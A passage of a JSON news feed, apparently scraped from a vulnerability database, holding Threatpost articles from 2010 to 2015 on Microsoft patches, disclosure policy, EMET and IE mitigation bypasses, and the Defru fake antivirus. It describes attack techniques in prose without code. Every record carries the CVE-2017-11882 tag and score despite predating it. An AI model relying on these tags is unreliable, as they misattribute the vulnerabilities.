policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. 
\n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n\u201cResponsible Disclosure should be deprecated in favor of something \nfocused on getting the job done, which is to improve security and to \nprotect users and systems. As such, Microsoft is asking researchers to \nwork with us under Coordinated Vulnerability Disclosure, and added some \ncoordinated public disclosure possibilities before a vendor-supplied \npatch is available when active attacks are underway. It uses the trigger \nof attacks in the wild to switch modes, which is an event that is \nobjectively observable by many independent sources,\u201d she wrote. \u201cMake no mistake about it, CVD is basically founded on the initial \npremise of Responsible Disclosure, but with a coordinated public \ndisclosure strategy if attacks begin in the wild. That said, what\u2019s \ncritical in the reframing is the heightened role coordination and shared \nresponsibility play in the nature and accepted practice of \nvulnerability disclosure. 
This is imperative to understand amidst a \nchanging threat landscape, where we all accept that no longer can one \nindividual, company or technology solve the online crime challenge.\u201d \n", "cvss3": {}, "published": "2010-07-22T16:50:37", "type": "threatpost", "title": "Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:21:38", "id": "THREATPOST:E539817E8025A93279C63158F37F2DFB", "href": "https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:39", "description": "[](<https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/>)The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities. \n\nThree of the bulletins are rated \u201ccritical\u201d because of the risk of remote code execution attacks. 
Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).\n\nThis month\u2019s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.\n\nMicrosoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.\n\nHere\u2019s the skinny on these three bulletins:\n\n * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) \u2014 This security update resolves two privately reported vulnerabilities \nin Microsoft Windows. These vulnerabilities could allow remote code \nexecution if a user opens a specially crafted media file or receives \nspecially crafted streaming content from a Web site or any application \nthat delivers Web content. 
This is rated Critical for Quartz.dll \n(DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, \nWindows Vista, and Windows Server 2008; Critical for Windows Media \nFormat Runtime on Microsoft Windows 2000, Windows XP, and Windows Server \n2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows \n2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server \n2008, Windows 7, and Windows Server 2008 R2; and Important for Windows \nMedia Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, \nWindows Server 2003, Windows Vista, and Windows Server 2008.\n * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) \u2014 This security update addresses two privately reported vulnerabilities \nfor Microsoft software. This security update is rated Critical for all \nsupported editions of Microsoft Windows 2000, Windows XP, Windows Vista, \nand Windows 7, and Moderate for all supported editions of Windows \nServer 2003, Windows Server 2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code \nexecution if a user views a specially crafted Web page that instantiates \na specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.\n * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) \u2014 Fixes five privately reported vulnerabilities and one publicly \ndisclosed vulnerability in Internet Explorer. The most severe \nvulnerabilities could allow remote code execution if a user views a \nspecially crafted Web page using Internet Explorer. 
Users whose accounts \nare configured to have fewer user rights on the system could be less \nimpacted than users who operate with administrative user rights. This \nsecurity update is rated Critical for Internet Explorer 6 Service Pack 1 \non Microsoft Windows 2000 Service Pack 4; Critical for Internet \nExplorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows \nclients; and Moderate for Internet Explorer 6, Internet Explorer 7, and \nInternet Explorer 8 on Windows servers.\n\nQualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the Pwn2Own vulnerability that security researcher Peter Vreugdenhil used to win ZDI\u2019s competition at CanSecWest. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods. \n\nThe MS10-040 bulletin is also interesting. It covers a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset. 
Microsoft rates this an \u201cimportant\u201d update.\n", "cvss3": {}, "published": "2010-06-08T19:07:32", "type": "threatpost", "title": "Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:36:58", "id": "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "href": "https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "[](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/>)Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) that will offer government entities at the national level technical information on vulnerabilities being fixed in Microsoft\u2019s products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. 
While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. 
Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delayed Free were bound to attract some attention, and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. 
With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects likely to be targeted, such as JavaScript objects, remain in the default heap, he said.\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object\u2019s memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. 
\u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) that searches IE for all objects, their sizes, and whether each is allocated on the default or the isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-lived type and can basically upgrade it to an existing attack to bypass these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. 
\u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation of privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. 
They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web Apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance; for example, an attacker would need local access or legitimate credentials to exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. 
IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by one such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet 
blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. 
\u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. 
That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making them so attractive to attackers and exploit writers.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. 
Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director of Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), includes a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as a favorite exploit for attackers.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built in to the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user to open a malicious Microsoft Office file that invokes a resource in the Media Center. 
This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePoint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. 
Both bugs require certain circumstances be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. 
With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. 
Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET check in the Operation SnowMan exploit, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique in use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build a ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 makes it much harder for attackers to jump to code at a known memory location: DEP stops injected data from executing, and ASLR randomizes where modules are loaded in the process.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. 
\u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force the process to leak memory contents back to the exploit, the attacker can reuse that information to bypass ASLR and DEP, because he then knows where the module is located and can build a ROP chain from its code, Vreugdenhil said. From there, an attacker needs to work out which additional memory protections are in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. 
\u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. 
More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nAn IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the 